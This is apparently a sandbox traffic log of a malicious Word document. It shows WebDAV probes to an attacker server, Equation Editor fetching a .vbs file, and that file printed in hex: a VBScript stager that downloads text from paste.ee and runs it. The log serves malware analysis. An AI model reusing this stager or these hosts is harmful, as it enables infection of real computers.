Feb 13, 2024 15:07:56.559858084 CET	166	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 4c 45 4f 2f 43 4c 4f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d Data Ascii: PROPFIND /LEO/CLO HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
Feb 13, 2024 15:07:56.754338980 CET	626	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 13 Feb 2024 14:07:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Location: http://91.92.244.96/LEO/CLO/ Content-Length: 338 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 39 31 2e 39 32 2e 32 34 34 2e 39 36 2f 4c 45 4f 2f 43 4c 4f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 39 32 2e 32 34 34 2e 39 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://91.92.244.96/LEO/CLO/">here</a>.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 91.92.244.96 Port 80</address></body></html>
Feb 13, 2024 15:07:56.754657030 CET	167	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 4c 45 4f 2f 43 4c 4f 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d Data Ascii: PROPFIND /LEO/CLO/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
Feb 13, 2024 15:07:56.950850010 CET	252	IN	HTTP/1.1 200 OK Date: Tue, 13 Feb 2024 14:07:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Feb 13, 2024 15:07:57.324940920 CET	162	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 4c 45 4f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 Data Ascii: PROPFIND /LEO HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
Feb 13, 2024 15:07:57.521250010 CET	618	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 13 Feb 2024 14:07:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Location: http://91.92.244.96/LEO/ Content-Length: 334 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 39 31 2e 39 32 2e 32 34 34 2e 39 36 2f 4c 45 4f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 39 32 2e 32 34 34 2e 39 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://91.92.244.96/LEO/">here</a>.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 91.92.244.96 Port 80</address></body></html>
Feb 13, 2024 15:07:57.521579981 CET	163	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 4c 45 4f 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 Data Ascii: PROPFIND /LEO/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
Feb 13, 2024 15:07:57.716953039 CET	252	IN	HTTP/1.1 200 OK Date: Tue, 13 Feb 2024 14:07:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Feb 13, 2024 15:07:58.032474041 CET	162	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 4c 45 4f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 Data Ascii: PROPFIND /LEO HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
Feb 13, 2024 15:07:58.227377892 CET	618	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 13 Feb 2024 14:07:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Location: http://91.92.244.96/LEO/ Content-Length: 334 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 39 31 2e 39 32 2e 32 34 34 2e 39 36 2f 4c 45 4f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 39 32 2e 32 34 34 2e 39 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://91.92.244.96/LEO/">here</a>.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 91.92.244.96 Port 80</address></body></html>
Feb 13, 2024 15:07:58.227669954 CET	163	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 4c 45 4f 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 Data Ascii: PROPFIND /LEO/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
Feb 13, 2024 15:07:58.422908068 CET	252	IN	HTTP/1.1 200 OK Date: Tue, 13 Feb 2024 14:07:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Feb 13, 2024 15:07:58.790348053 CET	166	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 4c 45 4f 2f 43 4c 4f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d Data Ascii: PROPFIND /LEO/CLO HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
Feb 13, 2024 15:07:58.984886885 CET	626	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 13 Feb 2024 14:07:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Location: http://91.92.244.96/LEO/CLO/ Content-Length: 338 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 39 31 2e 39 32 2e 32 34 34 2e 39 36 2f 4c 45 4f 2f 43 4c 4f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 39 32 2e 32 34 34 2e 39 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://91.92.244.96/LEO/CLO/">here</a>.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 91.92.244.96 Port 80</address></body></html>
Feb 13, 2024 15:07:58.985347033 CET	167	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 4c 45 4f 2f 43 4c 4f 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d Data Ascii: PROPFIND /LEO/CLO/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
Feb 13, 2024 15:07:59.180320978 CET	252	IN	HTTP/1.1 200 OK Date: Tue, 13 Feb 2024 14:07:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Feb 13, 2024 15:07:59.500005007 CET	162	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 4c 45 4f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 Data Ascii: PROPFIND /LEO HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
Feb 13, 2024 15:07:59.694778919 CET	618	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 13 Feb 2024 14:07:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Location: http://91.92.244.96/LEO/ Content-Length: 334 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 39 31 2e 39 32 2e 32 34 34 2e 39 36 2f 4c 45 4f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 39 32 2e 32 34 34 2e 39 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://91.92.244.96/LEO/">here</a>.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 91.92.244.96 Port 80</address></body></html>
Feb 13, 2024 15:07:59.695177078 CET	163	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 4c 45 4f 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 Data Ascii: PROPFIND /LEO/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
Feb 13, 2024 15:07:59.890594006 CET	252	IN	HTTP/1.1 200 OK Date: Tue, 13 Feb 2024 14:07:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Feb 13, 2024 15:08:03.274223089 CET	297	IN	HTTP/1.1 302 Found Date: Tue, 13 Feb 2024 14:08:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Location: http://91.92.244.96/dashboard/ Content-Length: 0 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Feb 13, 2024 15:08:03.475225925 CET	612	IN	HTTP/1.1 405 Method Not Allowed Date: Tue, 13 Feb 2024 14:08:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Allow: GET,POST,OPTIONS,HEAD,TRACE Content-Length: 327 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 39 32 2e 32 34 34 2e 39 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 91.92.244.96 Port 80</address></body></html>
Feb 13, 2024 15:08:04.019653082 CET	297	IN	HTTP/1.1 302 Found Date: Tue, 13 Feb 2024 14:08:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Location: http://91.92.244.96/dashboard/ Content-Length: 0 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Feb 13, 2024 15:08:04.217869043 CET	612	IN	HTTP/1.1 405 Method Not Allowed Date: Tue, 13 Feb 2024 14:08:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Allow: GET,POST,OPTIONS,HEAD,TRACE Content-Length: 327 Keep-Alive: timeout=5, max=85 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 39 32 2e 32 34 34 2e 39 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 91.92.244.96 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49165	91.92.244.96	80	848	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Feb 13, 2024 15:08:00.220447063 CET	246	OUT	HEAD /LEO/CLO/microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan.doC HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 91.92.244.96 Content-Length: 0 Connection: Keep-Alive
Feb 13, 2024 15:08:00.415889025 CET	322	IN	HTTP/1.1 200 OK Date: Tue, 13 Feb 2024 14:08:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Tue, 13 Feb 2024 00:44:29 GMT ETag: "11148-61138b265f87f" Accept-Ranges: bytes Content-Length: 69960 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49166	91.92.244.96	80	1668	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
Feb 13, 2024 15:08:01.371797085 CET	317	OUT	GET /LEO/Leoloverme.vbs HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.92.244.96 Connection: Keep-Alive
Feb 13, 2024 15:08:01.568494081 CET	942	IN	HTTP/1.1 200 OK Date: Tue, 13 Feb 2024 14:08:01 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Tue, 13 Feb 2024 00:40:42 GMT ETag: "292-61138a4e7f150" Accept-Ranges: bytes Content-Length: 658 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: ff fe 74 00 61 00 70 00 69 00 72 00 69 00 62 00 61 00 20 00 3d 00 20 00 20 00 28 00 49 00 6e 00 74 00 28 00 28 00 61 00 66 00 72 00 69 00 63 00 61 00 6e 00 69 00 73 00 74 00 61 00 2d 00 67 00 61 00 6c 00 61 00 63 00 72 00 69 00 73 00 74 00 61 00 2b 00 31 00 29 00 2a 00 52 00 6e 00 64 00 2b 00 67 00 61 00 6c 00 61 00 63 00 72 00 69 00 73 00 74 00 61 00 29 00 29 00 0d 00 0a 00 53 00 65 00 74 00 20 00 69 00 6e 00 71 00 75 00 69 00 6c 00 69 00 6e 00 61 00 72 00 20 00 3d 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 4f 00 62 00 6a 00 65 00 63 00 74 00 28 00 22 00 57 00 69 00 6e 00 48 00 74 00 74 00 70 00 2e 00 57 00 69 00 6e 00 48 00 74 00 74 00 70 00 52 00 65 00 71 00 75 00 65 00 73 00 74 00 2e 00 35 00 2e 00 31 00 22 00 29 00 0d 00 0a 00 69 00 6e 00 71 00 75 00 69 00 6c 00 69 00 6e 00 61 00 72 00 2e 00 4f 00 70 00 65 00 6e 00 20 00 22 00 47 00 45 00 54 00 22 00 2c 00 22 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 70 00 61 00 73 00 74 00 65 00 2e 00 65 00 65 00 2f 00 64 00 2f 00 6b 00 6d 00 52 00 46 00 73 00 22 00 2c 00 20 00 46 00 61 00 6c 00 73 00 65 00 0d 00 0a 00 69 00 6e 00 71 00 75 00 69 00 6c 00 69 00 6e 00 61 00 72 00 2e 00 53 00 65 00 6e 00 64 00 0d 00 0a 00 61 00 72 00 72 00 65 00 62 00 61 00 74 00 61 00 64 00 6f 00 72 00 20 00 3d 00 20 00 69 00 6e 00 71 00 75 00 69 00 6c 00 69 00 6e 00 61 00 72 00 2e 00 52 00 65 00 73 00 70 00 6f 00 6e 00 73 00 65 00 54 00 65 00 78 00 74 00 0d 00 0a 00 73 00 6f 00 6c 00 65 00 6e 00 6f 00 64 00 6f 00 6e 00 74 00 65 00 20 00 61 00 72 00 72 00 65 00 62 00 61 00 74 00 61 00 64 00 6f 00 72 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 